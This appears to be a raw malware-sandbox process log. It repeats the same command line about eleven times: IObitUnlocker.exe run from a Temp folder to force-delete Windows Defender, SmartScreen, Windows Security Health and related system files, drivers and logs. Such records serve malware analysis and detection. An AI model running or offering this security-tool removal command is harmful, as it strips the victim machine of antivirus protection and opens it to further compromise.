C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵PID:3512
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵PID:4624
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵PID:1796
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵PID:180
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵PID:3940
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵PID:1932
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵PID:5116
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵PID:1480
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵PID:1968
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵PID:5256
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵PID:5380
-
-
